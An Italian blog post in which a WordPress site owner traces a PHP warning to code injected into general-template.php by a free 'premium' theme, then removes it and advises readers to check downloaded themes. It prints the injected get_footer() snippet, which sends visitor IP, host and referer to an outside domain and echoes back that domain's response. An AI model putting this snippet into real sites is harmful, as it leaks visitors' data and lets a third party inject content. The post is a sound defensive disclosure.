WordPress: un errore da veri esperti, quello di HireWordPressExperts.com e 24365online.com
La manutenzione di tutte le installazioni WordPress e’ oramai un must quasi giornaliero; qualche giorno fa su Music Project ho notato un errore, una chiamata ad una funzione esterna ma non ho dato peso alla cosa: la mia connessione in quel momento era lenta e poteva benissimo essere colpa mia.
Oggi invece noto che l’errore era sempre la’:
Warning: file_get_contents(http://24365online.com/_YTG_yu/_dl/get_info.php? host=musicproject.virg0.org&referer=http:^^musicproject.virg0.org^&visitor_ip= 84.55.236.247) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 500 Internal Server Error in /srv/d_virg0/www/ musicproject.virg0.org/htdocs/wp-includes/general-template.php on line 61
Ho dato una controllata generale ma non mi risultava niente di sbagliato, almeno nei files sidebar.php, header.php, footer.php e index.php; sono stati i primi ad essere controllati, a volte potrebbe scappare qualche tag di chiusura, qualche virgoletta o altro. Ricontrollo l’errore generato: 24365online.com.. che roba e’?
Sono certa di non avere niente che richiama quell’URL!
Ricontrollo le widgets per vedere se qualcosa lo richiama e finalmente mi dedico al controllo della pagina chiamata in causa: general-template.php:
function get_footer( $name = null ) {/***HWEDLC***/ $host = $_SERVER["HTTP_HOST"]; $referer = $_SERVER["HTTP_REFERER"]; $referer = str_replace("/","^",$referer);$referer = str_replace("&","<<>>",$referer); $document = $_SERVER["DOCUMENT_ROOT"]; $visitor_ip = $_SERVER["REMOTE_ADDR"]; $url = "http://24365online.com/_YTG_yu/_dl/get_info.php?host=$host&referer=$referer&visitor_ip=$visitor_ip"; $content = file_get_contents($url); echo $content; /***HWEDLC***/ do_action( 'get_footer', $name );
Alla riga 61 c’e’ la chiamata all’URL in questione: 24365online.com che, visitatolo, presenta un laconico “Bandwidth Exceeded“. Tolta definitivamente la riga 61 tutto funziona correttamente.
Ma come ha fatto quella stringa a combinare tutto questo putiferio?
Googlando mi sono imbattura nel blog The Spirit of Humppa, un vecchio post parlava proprio di questo problema. Il sito HireWordPressExperts.com propone una serie di plugin e temi per WP (garantiti Premium e scaricabili free) che avevo scaricato ed installato prima di scegliere il tema definitivo per VMP (Koi, di Nick La).
Il tema che avvo installato e poi deattivato passa informazioni sui visitatori ad un altro sito.. e la cosa fa davvero poco onore a quelli di HWPE!
La soluzione e’ comunque comoda e veloce e non richiede grandi skill in campo WP o PHP, ma un controllino andrebbe sempre ripetuto, soprattutto quando si scaricano dei temi nuovi, anche dal sito ufficiale di WordPress, che ovviamente non ha il controllo su tutto il codice di tutti i temi pronti per il download; in caso trovaste altri temi che contengano lo stesso errore potete tranquillamente visitare la loro sezione dei contatti per riportare il problema e far si che il tema incriminato venga eliminato dal loro archivio.
Tutti gli articoli e le immagini presenti su ./lsd sono fruibili sotto licenza copyleft e protetti da Safe Creative; le immagini di terze parti sono protette da copyright dei rispettivi detentori.
Pingback: Tweets that mention WordPress: un errore da veri esperti, quello di HireWordPressExpress.com e 24365online.com | ./lsd - Liquid Sky Design | Graphic Design Studio -- Topsy.com